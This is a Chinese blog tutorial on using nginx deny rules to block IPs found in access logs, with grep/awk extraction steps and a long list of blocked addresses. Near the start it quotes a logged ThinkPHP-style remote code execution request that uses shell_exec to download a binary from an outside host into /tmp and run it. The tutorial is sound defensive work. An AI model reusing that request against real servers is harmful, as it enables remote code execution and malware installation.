  • 使用 Nginx 阻止恶意 IP 访问

    找到具有明显特征的访问记录,比如:

    156.203.12.198 -[01/Dec/2019:17:40:34 +0800] "GET /index.php?s=/index/x09hinkx07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://185.132.53.119/Ouija_x.86 -O /tmp/Ouija_x.86; chmod 777 /tmp/Ouija_x.86; /tmp/Ouija_x.86 Ouija_x.86' HTTP/1.1" 400 166 "-" "Ouija_x.86/2.0" "-"

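    从请求中的 invokefunction、call_user_func_array 等特征看,这很可能是针对某个开源 PHP 框架远程代码执行漏洞的利用尝试(路径特征与 ThinkPHP 的 invokefunction 类请求相似):通过请求参数指定要调用的函数(这里是 shell_exec),让服务器下载指定文件并执行。正因为危险,shell_exec 这类函数默认在 php.ini 是禁用的(注:是否禁用取决于具体环境,PHP 官方自带的 php.ini 中 disable_functions 默认为空,请自行检查确认)。另外,本例日志中该请求的响应状态码是 400,说明这一次请求没有成功。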

    匹配特征找出不重复的 IP,写入文件:

    # Collect each distinct first field of every log line that contains "shell_exec".
    # The first field is the client address only if the log format starts with $remote_addr;
    # behind a reverse proxy or CDN it may be the proxy's address — confirm before blocking.
    $ grep shell_exec /data/nginx_xxx/access.log | awk '{print $1}' | sort -u > blockips

    编辑一个 nginx 配置,加入到 location 访问中:

    # Writes the raw address list to blockips.conf. The file only becomes valid nginx syntax
    # after the "deny " / ";" edit described below, so do not reload nginx before that edit.
    $ cat blockips > /etc/nginx/conf.d/blockips.conf


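    location / {
        # Load the generated "deny <ip>;" rules. The include directive must end with ";",
        # otherwise nginx reads the next token as a second argument and rejects the config.
        # NOTE(review): a stock nginx.conf often includes conf.d/*.conf in the http block,
        # in which case this file is already applied globally — confirm for your setup.
        include /etc/nginx/conf.d/blockips.conf;
        # "xxxx;" stands for the location's existing directives.
        xxxx;
    }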

    用 vim 编辑 blockips.conf,在每行行首加 "deny ",行尾加 ";"(以下是 vim 的替换命令):

    %s/^/deny /g
    %s/$/;/g

    先用 nginx -t 确认配置语法无误,再重载 nginx,之后这些 IP 的访问会返回 403:

    # 宿主机模式
    $ nginx -s reload
    # Docker模式
    $ docker-compose restart nginx

    附一份恶意访问 IP(摘自当时的访问日志;这类来源 IP 可能随时间变动,使用前建议结合自己的日志核对):

    deny 156.194.121.215;
    deny 156.195.107.210;
    deny 156.195.39.140;
    deny 156.195.45.250;
    deny 156.196.146.114;
    deny 156.196.17.47;
    deny 156.196.229.206;
    deny 156.196.6.26;
    deny 156.198.62.131;
    deny 156.200.245.40;
    deny 156.201.18.181;
    deny 156.202.190.62;
    deny 156.202.251.75;
    deny 156.202.76.2;
    deny 156.202.84.179;
    deny 156.203.12.198;
    deny 156.203.210.142;
    deny 156.203.244.51;
    deny 156.203.7.75;
    deny 156.205.251.198;
    deny 156.205.81.35;
    deny 156.206.136.3;
    deny 156.206.182.152;
    deny 156.206.187.73;
    deny 156.206.231.65;
    deny 156.207.242.8;
    deny 156.208.42.167;
    deny 156.209.137.91;
    deny 156.209.40.94;
    deny 156.212.251.36;
    deny 156.214.142.160;
    deny 156.214.43.68;
    deny 156.217.6.172;
    deny 156.217.9.164;
    deny 156.218.133.186;
    deny 156.218.246.73;
    deny 156.219.214.185;
    deny 156.221.182.18;
    deny 156.222.20.232;
    deny 157.230.121.160;
    deny 167.172.104.251;
    deny 192.64.86.141;
    deny 197.33.213.164;
    deny 197.33.38.103;
    deny 197.34.0.63;
    deny 197.35.49.18;
    deny 197.36.233.108;
    deny 197.36.33.241;
    deny 197.36.4.226;
    deny 197.36.60.220;
    deny 197.40.152.66;
    deny 197.41.192.255;
    deny 197.41.76.25;
    deny 197.42.153.234;
    deny 197.43.203.16;
    deny 197.46.143.130;
    deny 197.46.88.69;
    deny 197.52.120.153;
    deny 197.52.86.59;
    deny 197.53.154.219;
    deny 197.57.10.160;
    deny 197.58.107.10;
    deny 197.61.10.30;
    deny 197.61.18.238;
    deny 197.61.62.151;
    deny 197.62.106.69;
    deny 197.63.152.246;
    deny 41.232.65.205;
    deny 41.233.204.74;
    deny 41.235.104.130;
    deny 41.236.148.6;
    deny 41.236.3.171;
    deny 41.238.205.186;
    deny 41.238.34.214;
    deny 41.35.143.95;
    deny 41.36.168.29;
    deny 41.36.196.47;
    deny 41.36.20.93;
    deny 41.36.221.70;
    deny 41.40.31.77;
    deny 41.42.219.201;
    deny 41.42.59.4;
    deny 41.43.34.248;
    deny 41.44.120.131;
    deny 41.45.98.34;
    deny 41.46.62.42;
    deny 41.47.75.136;
    deny 80.10.22.62;
    deny 95.14.156.128;
    deny 156.196.181.71;
    deny 156.196.191.37;
    deny 156.196.197.156;
    deny 156.196.3.62;
    deny 156.197.229.125;
    deny 156.201.133.105;
    deny 156.201.98.17;
    deny 156.202.112.54;
    deny 156.202.152.246;
    deny 156.202.31.234;
    deny 156.202.39.255;
    deny 156.203.54.61;
    deny 156.203.96.174;
    deny 156.204.165.223;
    deny 156.205.169.68;
    deny 156.206.214.19;
    deny 156.208.49.5;
    deny 156.208.51.140;
    deny 156.209.187.210;
    deny 156.209.35.200;
    deny 156.212.44.77;
    deny 156.213.35.145;
    deny 156.216.156.144;
    deny 156.218.136.219;
    deny 156.219.45.190;
    deny 156.220.186.189;
    deny 156.221.230.75;
    deny 156.221.8.69;
    deny 182.64.156.46;
    deny 197.33.205.142;
    deny 197.33.214.152;
    deny 197.33.99.150;
    deny 197.34.177.145;
    deny 197.35.113.116;
    deny 197.35.85.109;
    deny 197.36.186.126;
    deny 197.36.19.18;
    deny 197.37.180.73;
    deny 197.38.244.62;
    deny 197.40.184.150;
    deny 197.40.238.169;
    deny 197.41.112.15;
    deny 197.41.178.87;
    deny 197.41.86.1;
    deny 197.43.220.39;
    deny 197.45.9.234;
    deny 197.46.71.54;
    deny 197.47.108.224;
    deny 197.47.221.54;
    deny 197.52.165.67;
    deny 197.54.42.198;
    deny 197.56.28.28;
    deny 197.56.59.108;
    deny 197.57.167.86;
    deny 197.57.219.86;
    deny 197.59.221.148;
    deny 197.61.186.6;
    deny 197.61.85.58;
    deny 197.62.227.36;
    deny 197.63.13.29;
    deny 197.63.205.232;
    deny 41.232.17.135;
    deny 41.232.27.153;
    deny 41.234.133.17;
    deny 41.235.102.192;
    deny 41.235.244.63;
    deny 41.236.223.4;
    deny 41.236.56.8;
    deny 41.237.33.100;
    deny 41.239.135.65;
    deny 41.239.77.234;
    deny 41.42.35.168;
    deny 41.42.59.130;
    deny 41.45.30.236;
    deny 41.46.236.128;
    deny 41.46.255.174;
    deny 141.98.80.117;
    deny 141.98.80.42;
    deny 185.153.196.48;
    deny 185.153.198.163;
    deny 185.153.199.3;
    deny 185.156.177.10;
    deny 193.106.31.202;
    deny 193.188.22.123;
    deny 193.188.22.187;
    deny 193.188.22.234;
    deny 193.188.22.76;
    deny 193.188.23.25;
    deny 39.107.142.5;
    deny 41.216.186.89;
    deny 45.141.86.144;
    deny 46.161.27.112;

    Link:https://www.cnblogs.com/farwish/p/12080630.html

  • 原文地址:https://www.cnblogs.com/farwish/p/12080630.html